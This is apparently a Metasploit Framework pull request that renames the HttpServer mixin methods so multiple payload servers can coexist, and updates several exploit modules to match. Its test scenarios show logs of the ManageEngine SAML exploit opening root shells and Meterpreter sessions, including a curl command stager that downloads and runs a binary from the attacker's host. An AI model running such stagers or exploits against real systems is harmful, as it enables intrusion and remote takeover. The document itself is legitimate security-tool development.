### PR TITLE
Allow multiple HttpServer services to coexist in a module

### DIFF
--- a/lib/msf/core/exploit/cmd_stager.rb
+++ b/lib/msf/core/exploit/cmd_stager.rb
@@ -152,7 +152,7 @@ module Exploit::CmdStager
     if stager_instance.respond_to?(:http?) && stager_instance.http?
       opts[:ssl] = datastore['CMDSTAGER::SSL'] unless opts.key?(:ssl)
       opts['Path'] = datastore['CMDSTAGER::URIPATH'] unless datastore['CMDSTAGER::URIPATH'].blank?
-      opts[:payload_uri] = start_service(opts)
+      opts[:payload_uri] = cmdstager_start_service(opts)
     end
 
     cmd_list = stager_instance.generate(opts_with_decoder(opts))

--- a/lib/msf/core/exploit/cmd_stager/http.rb
+++ b/lib/msf/core/exploit/cmd_stager/http.rb
@@ -11,12 +11,16 @@ module HTTP
     ))
   end
 
-  def start_service(opts = {})
+  def cmdstager_start_service(opts = {})
     # XXX: This is a workaround until we can take SSL in opts
     datastore_ssl = datastore['SSL']
     datastore['SSL'] = !!opts[:ssl]
 
-    super
+    opts['Uri'] = {
+      'Proc' => Proc.new { |cli, req| cmdstager_on_request_uri(cli, req) },
+      'Path' => opts['Path'] || resource_uri
+    }.update(opts['Uri'] || {})
+    start_service(opts)
 
     payload_uri = get_uri
     datastore['SSL'] = datastore_ssl
@@ -24,7 +28,7 @@ module HTTP
     payload_uri
   end
 
-  def on_request_uri(cli, request)
+  def cmdstager_on_request_uri(cli, request)
     client = cli.peerhost
 
     if (user_agent = request.headers['User-Agent'])

--- a/lib/msf/core/exploit/remote/java/http/class_loader.rb
+++ b/lib/msf/core/exploit/remote/java/http/class_loader.rb
@@ -15,26 +15,30 @@ module ClassLoader
     ))
   end
 
-  def start_service(opts = {})
+  def java_class_loader_start_service(opts = {})
     # XXX: This is a workaround until we can take SSL in opts
     ssl = datastore['SSL']
     datastore['SSL'] = false
 
-    super
+    opts['Uri'] = {
+      'Proc' => Proc.new { |cli, req| java_class_loader_on_request_uri(cli, req) },
+      'Path' => opts['Path'] || java_class_loader_resource_uri
+    }.update(opts['Uri'] || {})
+    start_service(opts)
 
     datastore['SSL'] = ssl
     get_uri
   end
 
-  def resource_uri
-    return @resource_uri if @resource_uri
+  def java_class_loader_resource_uri
+    return @java_class_loader_resource_uri if @java_class_loader_resource_uri
     # the resource URI must end in / for the class loading to work
-    path = super
+    path = resource_uri
     path += '/' unless path.end_with?('/')
-    @resource_uri = path
+    @java_class_loader_resource_uri = path
   end
 
-  def on_request_uri(cli, request)
+  def java_class_loader_on_request_uri(cli, request)
     vprint_status("#{request.method} #{request.uri} requested")
 
     unless %w[HEAD GET].include?(request.method)
@@ -42,7 +46,7 @@ module ClassLoader
       return
     end
 
-    resource = request.raw_uri.delete_prefix(resource_uri)
+    resource = request.raw_uri.delete_prefix(java_class_loader_resource_uri)
 
     if request.method == 'HEAD'
       whitelist = %W[

--- a/modules/exploits/linux/http/suitecrm_log_file_rce.rb
+++ b/modules/exploits/linux/http/suitecrm_log_file_rce.rb
@@ -316,7 +316,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def start_http_server
-    start_service(
+    cmdstager_start_service(
       {
         'Uri' => {
           'Proc' => proc do |cli, req|

--- a/modules/exploits/linux/http/vmware_vrli_rce.rb
+++ b/modules/exploits/linux/http/vmware_vrli_rce.rb
@@ -256,7 +256,7 @@ class MetasploitModule < Msf::Exploit::Remote
     pak_name = "#{file_name}.pak"
     register_files_for_cleanup("/tmp/#{pak_name}")
     print_status('Starting Payload Server')
-    start_service('Path' => "/#{file_name}.tar")
+    cmdstager_start_service('Path' => "/#{file_name}.tar")
 
     # Connect to the Apache Thrift service
     thrift_client = Rex::Proto::Thrift::Client.new(

--- a/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb
+++ b/modules/exploits/linux/misc/saltstack_salt_unauth_rce.rb
@@ -193,7 +193,7 @@ class MetasploitModule < Msf::Exploit::Remote
       )
     when :unix_cmd
       # HTTPS doesn't appear to be supported by the server :(
-      print_status("Serving intermediate stager over HTTP: #{start_service}")
+      print_status("Serving intermediate stager over HTTP: #{cmdstager_start_service}")
 
       vprint_status("Executing Unix command: #{payload.encoded}")
 

--- a/modules/exploits/multi/http/apache_commons_text4shell.rb
+++ b/modules/exploits/multi/http/apache_commons_text4shell.rb
@@ -129,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
     case target['Type']
     when :java
       # Start the HTTP server to serve the payload
-      start_service
+      java_class_loader_start_service
       # Trigger a loadClass request via java.net.URLClassLoader
       trigger_urlclassloader
       # Handle the payload

--- a/modules/exploits/multi/http/liferay_java_unmarshalling.rb
+++ b/modules/exploits/multi/http/liferay_java_unmarshalling.rb
@@ -108,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     # Start our HTTP server to provide remote classloading
-    @classloader_uri = start_service
+    @classloader_uri = java_class_loader_start_service
 
     unless @classloader_uri
       fail_with(Failure::BadConfig, 'Could not start remote classloader server')

--- a/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
+++ b/modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb
@@ -150,7 +150,7 @@ class MetasploitModule < Msf::Exploit::Remote
     case target['Type']
     when :java
       # Start the HTTP server to serve the payload
-      start_service
+      java_class_loader_start_service
       # Trigger a loadClass request via java.net.URLClassLoader
       trigger_urlclassloader
       # Handle the payload
@@ -283,19 +283,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     res
-  end
-
-  # handle http requests from java stagers and cmd stagers differently
-  def on_request_uri(cli, request)
-    case target['Type']
-    when :java
-      super(cli, request)
-    else
-      client = cli.peerhost
-      print_status("Client #{client} requested #{request.uri}")
-      print_status("Sending payload to #{client}")
-      send_response(cli, exe)
-    end
   end
 
 end

--- a/modules/exploits/multi/http/microfocus_obm_auth_rce.rb
+++ b/modules/exploits/multi/http/microfocus_obm_auth_rce.rb
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     # Start our HTTP server to provide remote classloading
-    @classloader_uri = start_service
+    @classloader_uri = java_class_loader_start_service
 
     unless @classloader_uri
       fail_with(Failure::BadConfig, 'Could not start remote classloader server')

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -381,7 +381,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     case target.name
     when /Java/
-      @classloader_uri = start_service
+      @classloader_uri = java_class_loader_start_service
       execute_java('core_name' => @vuln_core[0], 'auth_string' => @auth_string)
       return
     end

--- a/modules/exploits/multi/http/torchserver_cve_2023_43654.rb
+++ b/modules/exploits/multi/http/torchserver_cve_2023_43654.rb
@@ -126,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    start_service
+    java_class_loader_start_service
 
     @model_name = rand_text_alphanumeric(8..15)
     print_status('Registering the model archive...')

--- a/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb
+++ b/modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb
@@ -130,7 +130,7 @@ class MetasploitModule < Msf::Exploit::Remote
     case target['Type']
     when :java
       # Start the HTTP server to serve the payload
-      start_service
+      java_class_loader_start_service
       # Trigger a loadClass request via java.net.URLClassLoader
       trigger_urlclassloader
       # Handle the payload


### PR DESCRIPTION
Adding multiple HttpServer services in a module is sometimes complex since they share the same methods. This usually causes issues like [this](https://github.com/rapid7/metasploit-framework/issues/18810#issuecomment-1934967086), where `#on_request_uri` needs to be overridden to handle requests coming from each service.

This PR is an attempt to fix this by making the common methods used by the `HttpServer` service unique. These methods are:
- `start_service`
- `on_request_uri`
- `resource_uri`

For now, I updated the `cmdstager` and the Java HTTP ClassLoader mixins, since these are commonly used in the same module. The `multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966` module as been updated to be compatible with these changes. The override of `on_request_uri` is not necessary anymore and has been removed.

~I left this PR as a draft since other modules will need to be updated (those using the Java HTTP ClassLoader). But I wanted to get feedback before moving forward.~

## How to test
The best way to test this is to install the vulnerable application (instructions can be found [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.md#installation)) and test target 0 (`Java (in-memory)`), target 1 (`Windows EXE Dropper`) and target 4 (`Linux Dropper`). They all should work as expected.

## Scenarios
### ManageEngine ServiceDesk Plus versions 14003 on Ubuntu 20.04.4
#### Target 0 (`Java (in-memory)`)
```
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.128.187 lhost=192.168.128.1 verbose=true

[*] Started reverse TCP handler on 192.168.128.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.128.1:8080/ZsavWaZESNHRpE/
[*] GET /ZsavWaZESNHRpE/metasploit/Payload.class requested
[+] Sending the main payload class
[*] HEAD /ZsavWaZESNHRpE/metasploit.dat requested
[+] Sending 200
[*] GET /ZsavWaZESNHRpE/metasploit.dat requested
[+] Sending the payload configuration data
[*] GET /ZsavWaZESNHRpE/javapayload/stage/Shell.class requested
[+] Sending additional payload class: javapayload/stage/Shell.class
[*] GET /ZsavWaZESNHRpE/javapayload/stage/Stage.class requested
[+] Sending additional payload class: javapayload/stage/Stage.class
[*] GET /ZsavWaZESNHRpE/javapayload/stage/StreamForwarder.class requested
[+] Sending additional payload class: javapayload/stage/StreamForwarder.class
[*] Command shell session 1 opened (192.168.128.1:4444 -> 192.168.128.187:59514) at 2024-02-13 16:02:21 +0100
[*] Exploit completed.
[*] Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)
```
#### Target 4 (`Linux Dropper`)
```
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 4
target => 4
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.128.187 lhost=192.168.128.1 verbose=true

[*] Started reverse TCP handler on 192.168.128.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.128.1:8080/WjgySU59DILnpv
[*] Generated command stager: ["curl -so /tmp/SrxbFAqg http://192.168.128.1:8080/WjgySU59DILnpv;chmod +x /tmp/SrxbFAqg;/tmp/SrxbFAqg;rm -f /tmp/SrxbFAqg"]
[*] Client 192.168.128.187 (curl/7.68.0) requested /WjgySU59DILnpv
[*] Sending payload to 192.168.128.187 (curl/7.68.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.128.187
[*] Meterpreter session 2 opened (192.168.128.1:4444 -> 192.168.128.187:41398) at 2024-02-13 16:03:33 +0100
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.

meterpreter >
```
### ManageEngine ServiceDesk Plus versions 14003 on Windows Server 2019
#### Target 1 (`Windows EXE Dropper`)
```
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set target 1
target => 1
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit rhosts=192.168.128.188 lhost=192.168.128.1 verbose=true

[*] Started reverse TCP handler on 192.168.128.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQA...[SNIP]...
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (201798 bytes) to 192.168.128.188
[*] Meterpreter session 3 opened (192.168.128.1:4444 -> 192.168.128.188:50309) at 2024-02-13 16:12:48 +0100
[*] Command Stager progress - 100.00% done (12025/12025 bytes)

meterpreter >
```
